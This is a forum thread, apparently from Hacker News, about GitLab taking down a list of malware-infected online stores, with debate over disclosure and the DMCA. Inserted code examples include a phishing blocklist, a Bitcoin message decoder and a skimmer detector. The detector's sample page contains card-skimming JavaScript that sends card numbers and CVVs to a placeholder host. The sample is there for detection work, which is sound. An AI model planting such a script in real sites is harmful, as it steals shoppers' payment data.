GL sent me this statement. For the record, I didn't publish vulnerable systems, I published stores that have malware.

---

Willem,

GitLab has opted to remove the list of servers that you posted in your snippet. GitLab views the exposure of the vulnerable systems as egregious and will not abide it.

While GitLab reserves the right to take further action, up to and including termination (https://about.gitlab.com/terms/), we have chosen not to terminate or lock your account.

Please know this decision was not reached lightly and we appreciate your understanding on the matter.

Regards,

GitLab

GitLab Support Team
GitLab, Inc.
We at GitLab believe the author did not responsibly disclose this security information in a proper manner, and today we removed the list of hosts in accordance with our terms of service (https://about.gitlab.com/terms/).

The author says that he contacted "about 30 merchants directly", but the published list includes over 1000 merchants. Most merchants were neither informed nor given a chance to respond in a timely manner. We did not feel comfortable hosting information that could be construed as an open invitation for malicious users to exploit.
Archive of the list on Gitlab which is now 404:

https://web.archive.org/web/20161014133252/https://gitlab.com/gwillem/public-snippets/snippets/28813
Do this kind of thing on your own domain.

I have a list of major sites with currently active phishing pages.[1] This is basically a join of PhishTank and DMOZ. Nobody seems to be upset by that.

Google is at the top of the list because of their hosting business. It's not just Google Sites. You can put a web site in a Google Spreadsheet cell, which Google doesn't seem to check as a possible phishing site.

If you host for others, or offer a URL shortening service, you need automated checking against all available phishing lists or you will be exploited.

[1] http://sitetruth.com/reports/phishes.html
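One way to do the automated check the comment above calls for, as an added example that is not from the original thread and not sitetruth.com's code: a shortener-style gate that canonicalizes a submitted URL and matches it against a blocklist holding both whole hosts (dedicated phishing domains) and URL prefixes (one bad page on a shared host such as a sites or spreadsheets service, where blocking the whole host would be wrong). The blocklist entries and hostnames are constructed for the example; a real deployment would load them from PhishTank and similar feeds.

```python
import posixpath
from urllib.parse import urlsplit, urlunsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def normalize(url: str) -> str:
    """Canonicalize a URL so that trivially different spellings compare equal.

    Handles mixed-case scheme/host, the userinfo trick (https://good.example@bad.example/),
    a trailing dot on the host, explicit default ports and /./ or /../ path segments.
    The fragment is dropped because the server never sees it.
    """
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").rstrip(".").lower()  # .hostname already strips userinfo and port
    port = parts.port
    netloc = host if port in (None, DEFAULT_PORTS.get(scheme)) else f"{host}:{port}"
    path = posixpath.normpath(parts.path or "/")
    return urlunsplit((scheme, netloc, path, parts.query, ""))


class PhishingBlocklist:
    """Host entries block a domain and all its subdomains; prefix entries block one
    URL subtree on a host that otherwise serves legitimate content."""

    def __init__(self, hosts, url_prefixes):
        self.hosts = {h.lower().rstrip(".") for h in hosts}
        self.prefixes = {normalize(p) for p in url_prefixes}

    def match(self, url: str):
        """Return a string naming the matching entry, or None if the URL is clean."""
        norm = normalize(url)
        host = urlsplit(norm).hostname or ""
        labels = host.split(".")
        # Walk from the full host up to, but not including, the bare TLD.
        for i in range(len(labels) - 1):
            candidate = ".".join(labels[i:])
            if candidate in self.hosts:
                return f"host:{candidate}"
        for prefix in self.prefixes:
            if norm == prefix or norm.startswith(prefix + "/") or norm.startswith(prefix + "?"):
                return f"prefix:{prefix}"
        return None


def accept_for_shortening(url: str, blocklist: PhishingBlocklist):
    """What a URL shortener or hosting signup form would call before creating a link."""
    hit = blocklist.match(url)
    return (hit is None, hit)


# Constructed entries standing in for a feed like PhishTank; none of these are real sites.
BLOCKLIST = PhishingBlocklist(
    hosts=["phish-example.test"],
    url_prefixes=["https://sites.example/view/badpage",
                  "https://docs.example/spreadsheets/d/abc123"],
)

if __name__ == "__main__":
    for u in ["https://www.phish-example.test/login",
              "HTTPS://good.example@Phish-Example.TEST.:443/",
              "https://sites.example/view/../view/badpage/index.html",
              "https://sites.example/view/goodpage"]:
        print(u, "->", accept_for_shortening(u, BLOCKLIST))
```

Percent-encoding and IDNA variants are deliberately left out of `normalize`; a production gate would fold those too, and would re-check already-shortened links periodically, since feeds list a page only after it has gone live.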
> I understand that Github doesn't have the resources to investigate each and every DMCA notice.

The DMCA as written really encourages no investigation whatsoever on the part of the service provider, this is pretty much how everyone acts. File a counter-notice with the service provider if you don't think your content violates anyone's copyright.

In this case, if Github took it down because of a DMCA notice, I think Github actually behaved _better_ than Gitlab. Github is simply following DMCA, if you file a counter-notice, they'll probably restore it -- if they don't, and say it's not an issue of copyright, it's just that they don't want to host your material, then at that point they'll be behaving similarly to Gitlab. Gitlab did not take it down because of a DMCA notice, they took it down because they decided it was 'egregious' and they just didn't want to host it.

https://help.github.com/articles/guide-to-submitting-a-dmca-counter-notice/

I can't find any gitlab docs on filing a DMCA counter notice. Their DMCA policy at https://about.gitlab.com/dmca/ is short and solely targeted at those claiming infringement, there is no description of how to file a counter-notice.

In this case, I think github wins. The terrible parts of github's counter-notice policy (10-14 days until your content comes back) are part of the DMCA law. Take it up with your congresspeople. http://io9.gizmodo.com/the-dmca-how-it-works-and-how-its-abused-1616830093

However, reading OP again -- it's not clear to me that Github took it down because of DMCA. They may simply be acting exactly like Gitlab, taking it down because they don't want to host it, unrelated to DMCA. But I wanted to clear up some things about the DMCA, since OP mentioned it.
How exactly does publishing a list of malware-infected stores fall under the DMCA? I always thought DMCA was meant to be for copyright infringement cases.

I didn't see the list, but did it by any chance contain the logos of the online stores? If it did, the DMCA notices make sense.
Gitlab CEO just called me and apologized, will restore data shortly.

I am personally very sorry that GL got in a bad light here. They had misinterpreted my data and have acknowledged that. For comparison, I have heard nothing from GH over the last two days.

Gitlab, you rock.
GitLab and GitHub are both pretty active on HN. I look forward to their response - where is it already?!

I'm especially disappointed by GL. GH is already too big to care about such things.
There is a service http://www.cryptograffiti.info/ which can be used for posting sensitive information that should not be removed or hidden. It allows you to write a message and store it in the Bitcoin blockchain as a transaction. It costs near 0.0015 BTC or $1 per kB. Large files can be posted as magnet links to torrents with them.

Even if the service's site had been shut down, everyone would always be able to obtain the transaction from its hash using any bitcoin client/blockchain explorer, convert it to ASCII and read the text.

I'd like to note that it is worth signing all messages posted that way with GPG in order to have the ability to post updates and verify authorship.
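For the "convert it to ASCII" step the comment above mentions, here is an added example that is not from the original thread and is not cryptograffiti's own code: it builds a constructed, unsigned legacy-format transaction whose data output is an OP_RETURN script carrying the message, then parses the raw hex the way a block explorer or `getrawtransaction` would return it and recovers the text. OP_RETURN is one embedding method (Bitcoin Core's default relay policy allows 80 data bytes in it); the example assumes that method rather than whatever encoding the service itself uses. The input transaction ID and the address hash in the change output are placeholders.

```python
import struct

OP_RETURN = 0x6A
OP_PUSHDATA1 = 0x4C
OP_PUSHDATA2 = 0x4D


def encode_varint(n: int) -> bytes:
    """Bitcoin CompactSize encoding."""
    if n < 0xFD:
        return bytes([n])
    if n <= 0xFFFF:
        return b"\xfd" + struct.pack("<H", n)
    if n <= 0xFFFFFFFF:
        return b"\xfe" + struct.pack("<I", n)
    return b"\xff" + struct.pack("<Q", n)


def read_varint(buf: bytes, pos: int):
    """Decode a CompactSize at buf[pos]; returns (value, next position)."""
    first = buf[pos]
    if first < 0xFD:
        return first, pos + 1
    if first == 0xFD:
        return struct.unpack_from("<H", buf, pos + 1)[0], pos + 3
    if first == 0xFE:
        return struct.unpack_from("<I", buf, pos + 1)[0], pos + 5
    return struct.unpack_from("<Q", buf, pos + 1)[0], pos + 9


def op_return_script(data: bytes) -> bytes:
    """OP_RETURN <push>: a direct push opcode for <=75 bytes, OP_PUSHDATA1 up to 255."""
    if len(data) <= 75:
        push = bytes([len(data)])
    elif len(data) <= 255:
        push = bytes([OP_PUSHDATA1, len(data)])
    else:
        raise ValueError("too large for a single OP_RETURN output")
    return bytes([OP_RETURN]) + push + data


def build_message_tx(message: str) -> str:
    """Constructed, unsigned legacy transaction carrying `message`; returns raw hex."""
    prev_txid = bytes.fromhex("11" * 32)            # placeholder outpoint, not a real txid
    tx = struct.pack("<I", 1)                        # version
    tx += encode_varint(1)                           # one input
    tx += prev_txid[::-1] + struct.pack("<I", 0)     # outpoint (txid is byte-reversed on the wire)
    tx += encode_varint(0)                           # empty scriptSig: this example is unsigned
    tx += struct.pack("<I", 0xFFFFFFFF)              # sequence
    change = b"\x76\xa9\x14" + b"\x22" * 20 + b"\x88\xac"   # P2PKH with a placeholder pubkey hash
    outputs = [(0, op_return_script(message.encode("utf-8"))), (50_000, change)]
    tx += encode_varint(len(outputs))
    for value, script in outputs:
        tx += struct.pack("<q", value) + encode_varint(len(script)) + script
    tx += struct.pack("<I", 0)                       # locktime
    return tx.hex()


def _pushed_bytes(script: bytes) -> bytes:
    """Decode the single data push that follows OP_RETURN."""
    if not script:
        return b""
    op = script[0]
    if 1 <= op <= 75:
        return script[1:1 + op]
    if op == OP_PUSHDATA1:
        return script[2:2 + script[1]]
    if op == OP_PUSHDATA2:
        n = struct.unpack_from("<H", script, 1)[0]
        return script[3:3 + n]
    return b""


def extract_op_return_text(raw_hex: str):
    """Walk a raw transaction and return the text carried by every OP_RETURN output."""
    raw = bytes.fromhex(raw_hex)
    pos = 4                                          # version
    if raw[4] == 0x00 and raw[5] == 0x01:            # segwit marker+flag; witness data sits after the outputs
        pos = 6
    n_in, pos = read_varint(raw, pos)
    for _ in range(n_in):
        pos += 36                                    # previous txid + output index
        slen, pos = read_varint(raw, pos)
        pos += slen + 4                              # scriptSig + sequence
    n_out, pos = read_varint(raw, pos)
    texts = []
    for _ in range(n_out):
        pos += 8                                     # value
        slen, pos = read_varint(raw, pos)
        script = raw[pos:pos + slen]
        pos += slen
        if script and script[0] == OP_RETURN:
            texts.append(_pushed_bytes(script[1:]).decode("utf-8", errors="replace"))
    return texts


if __name__ == "__main__":
    hex_tx = build_message_tx("constructed example message")
    print(hex_tx)
    print(extract_op_return_text(hex_tx))
```

Because the reader only needs the raw bytes, the decoding side works against any copy of the transaction, which is the durability argument the comment makes; the GPG-signing advice still applies, since nothing in the transaction itself proves who wrote the message.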
After briefly looking at https://github.com/github/dmca/tree/master/2016 there doesn't appear to be any DMCA request for gwillem's content, so maybe it wasn't removed through the DMCA process?
Definitely feels like a bad interpretation on Gitlab's part, but not done out of malice.

The person was not exposing sites that nobody previously knew about -- the sites were already compromised, there is nothing to compromise again except maybe having more than one attacker in your compromised account. The damage is already done, though.

These are likely web applications that were not kept up to date so the responsible security disclosure already happened when it was reported for WordPress/Drupal/Joomla. It is the site owners' responsibility to pay attention to those security disclosures, which they likely failed to do.

And those compromised sites, in my experience, are usually attacking and infecting other sites and servers on the Internet. That makes them a public nuisance and so public disclosure is necessary so they can be appropriately blocked/isolated.
Discussion of origin of the list here

https://news.ycombinator.com/item?id=12707860
Article doesn't say that gitlab censored the list, though the gitlab link is a 404.

Also, are they actually using DMCA to get these lists taken down? If so, isn't there some penalty for filing a false DMCA?
Perhaps distributing this list is a use case for IPFS?

https://ipfs.io/docs/getting-started/
> I understand that Github doesn't have the resources to investigate each and every DMCA notice. However, it still took me by surprise that Github censors data so easily.

Send a counter-notification asserting that the data is not under copyright and have it put back up. Assuming this is really DMCA.
So it seems the real bug here is that a site that is hosting malware is doing so because it's actually vulnerable to being hacked, was hacked, and malware was installed. So posting the site name identifies a vulnerable site (which is wrong) and stops informing people that those sites have malware on them (which is an issue as well).

That is quite the catch 22. And of course many of the site owners are clueless and don't even know how to patch or fix their systems.

My, isn't that a mess?
Isn't it the whole point of GitLab that it's decentralized? As in, you can roll your own instance and stop worrying about censorship?

I'm pretty sure someone here has a GitLab instance that is willing to share for this purpose.
Back to the original problem of skimming.

I think the fastest way to get sites fixed is to run a script that crawls sites in the list, parses their Twitter and posts a warning there with link to original article.

Can someone help with that?
And just like that, we discover how helpless the average Joe is against corporate money.

Let's crowdfund an AWS S3+CloudFront hosted site. DDoSing that is no easy feat, and if corps do try it, the logs can prove their complicity, which has legal implications I presume
As soon as I read this I assumed it was as a libel prevention method.

I'd be curious whether Gitlab/hub could be held responsible for proving the accuracy of the claims? (That was my initial assumption as to the reason they were taken down.)
Why is a third-party required to publish the list, couldn't it be hosted on the blog post itself? That would have the advantage of being able to archive the whole thing on a single page.
To be fair, maybe some automated method that hub/lab owners have not vetted the data overall. I hope your list stays up/public personally as long as you are willing to take responsibility for its upkeep. I wish there was some format to submit this list (and your responsibility for keeping up with it) to vendors on the lookout for this kinda stuff (up to them to decide inclusion).
I don't know enough about these kinds of situations yet to form a reasonable argument for-or-against. Is what was done considered a kind, favourable thing for the developers behind those sites or is it something that shouldn't have been displayed?
"Moderated", not "censored". Neither GitHub nor GitLab have stopped the message going out from outlets other than their own. Would we be comfortable calling the moderators here on HN "censors"?
I tried to pay in several of these shops. Most didn't even have the functionality to pay with card. The only one in my sample where I was able to get to the payment form had redirected me to the proper payment gateway.
http://gogsys33repvmfz5.onion/ Free gog git server in Tor.

Also, it will ask for an email on registration, but it isn't verified and no email is sent.
I wonder how google acts, if you dump the list here:

https://www.google.com/safebrowsing/report_badware/
Now I see. I thought this was a list of stores hacked through the current vulnerability. This is a list of stores hacked through 1-2y old vulnerabilities.
I'm kind of with Gitlab on this one, just publishing a list of broken sites isn't going to help them get fixed. Most of the owners probably barely know the Googles from the Facebooks, so even if you email them saying 'you have this JavaScript thing that's bad' they won't understand and will blow you off.

OP doesn't go into details of how they check the stores, but I'd assume they have some sort of script as they checked 255k. If that's the case it would be trivial to send an automated email if malware is detected, and include links explaining how to fix it.

It won't resolve everything but it's a lot nicer than naming & shaming businesses who have effectively done nothing wrong. What I mean is they probably hired a developer or team to build their website, and assumed that they would build a secure website - they didn't go out purposely and find someone to build them a site that would be hacked.
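An added example, my code rather than the original author's scanner, of the automation two comments in this thread ask for: the one directly above (send an automated email when malware is detected, with links explaining the fix) and the earlier one proposing a script that crawls each listed site, finds its Twitter account and posts a warning there. It looks for a constructed skimmer indicator in a page (an inline script that hooks user input, reads card fields and references a host other than the store's own), pulls the store's Twitter handle and contact address out of the same page, and drafts the notifications without sending them. The heuristics, sample pages, hosts and handles are all made up for the example; a real scanner would use a vetted signature set and fetch pages over the network.

```python
import re
from email.message import EmailMessage
from urllib.parse import urlsplit

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"<>]*)?")
# Constructed indicator set: form field names a skimmer typically reads, and the
# event hooks it uses to read them. A production scanner would carry a vetted list.
CARD_FIELD_RE = re.compile(r"cc_number|card_number|cc_cid|cvv|cc_exp", re.I)
HOOK_RE = re.compile(r"addEventListener\s*\(\s*['\"](?:submit|keyup|change)|\bonsubmit\b|\bsetInterval\s*\(", re.I)


def find_skimmer_indicators(store_host: str, html: str):
    """Inline scripts that hook input, touch card fields and talk to a foreign host."""
    hits = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        if not (CARD_FIELD_RE.search(body) and HOOK_RE.search(body)):
            continue
        for url in URL_RE.findall(body):
            host = (urlsplit(url).hostname or "").lower()
            # The store posting card data to its own checkout host is normal; skip it.
            if host and host != store_host and not host.endswith("." + store_host):
                hits.append({"exfil_host": host, "url": url})
    return hits


TWITTER_RE = re.compile(r"https?://(?:www\.)?twitter\.com/([A-Za-z0-9_]{1,15})(?=[\"'/?#\s<]|$)")
MAILTO_RE = re.compile(r"mailto:([^\"'?\s<>]+)")
NOT_HANDLES = {"share", "intent", "home", "search"}   # twitter.com paths that are not accounts


def find_contacts(html: str):
    """Twitter handles and e-mail addresses the page itself links to."""
    handles = sorted({h for h in TWITTER_RE.findall(html) if h.lower() not in NOT_HANDLES})
    emails = sorted(set(MAILTO_RE.findall(html)))
    return {"twitter": handles, "email": emails}


def draft_notifications(store_host, hits, contacts, article_url, sender="scanner@example.test"):
    """Build, but do not send, one e-mail per address and one tweet per handle."""
    exfil = ", ".join(sorted({h["exfil_host"] for h in hits}))
    emails = []
    for addr in contacts["email"]:
        msg = EmailMessage()
        msg["From"] = sender
        msg["To"] = addr
        msg["Subject"] = f"Card-skimming script found on {store_host}"
        msg.set_content(
            f"An inline script on https://{store_host}/ reads payment card fields and sends them to {exfil}.\n"
            f"Background and fix instructions: {article_url}\n")
        emails.append(msg)
    tweets = [f"@{h} your store {store_host} is running a card-skimming script sending data to {exfil}. Details: {article_url}"
              for h in contacts["twitter"]]
    return emails, tweets


# Constructed sample pages; no real store or collector host is referenced.
INFECTED_PAGE = """<html><body>
<a href="https://twitter.com/examplestore">Follow us</a>
<a href="https://twitter.com/share?url=x">Share</a>
<a href="mailto:shop@examplestore.test">Contact</a>
<form id="co"><input name="cc_number"><input name="cc_cid"></form>
<script>
document.getElementById('co').addEventListener('submit', function () {
  var d = {n: document.getElementsByName('cc_number')[0].value,
           c: document.getElementsByName('cc_cid')[0].value};
  new Image().src = 'https://collector.example/g.php?d=' + btoa(JSON.stringify(d));
});
</script></body></html>"""

CLEAN_PAGE = """<html><body><form id="co"><input name="cc_number"></form>
<script>
document.getElementById('co').addEventListener('submit', function () {
  var n = document.getElementsByName('cc_number')[0].value;
  fetch('https://checkout.examplestore.test/api/pay', {method: 'POST', body: n});
});
</script><script src="https://analytics.example/a.js"></script></body></html>"""

if __name__ == "__main__":
    hits = find_skimmer_indicators("examplestore.test", INFECTED_PAGE)
    emails, tweets = draft_notifications("examplestore.test", hits, find_contacts(INFECTED_PAGE),
                                         "https://example.test/article")
    print(hits, tweets, emails[0]["To"])
```

The host comparison is what keeps the clean page clean: a store's own script reading card fields and posting to its own checkout subdomain is expected, so only a foreign destination counts. Externally loaded `<script src>` files are not inspected here; a real scanner fetches and scans those too, since skimmers are as often injected into an existing JS file as inlined.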
The malicious code on those websites isn't your business guys. If their owners wish not to respond and not fix it -- they have a right to do so. Why are you all so anxious? It has nothing to do with you all. Just don't buy from them, that is simple.

Needless to say, I've seen most of those websites for the 1st time.

The world is unfair? No, it's fair and this proves that it is fair.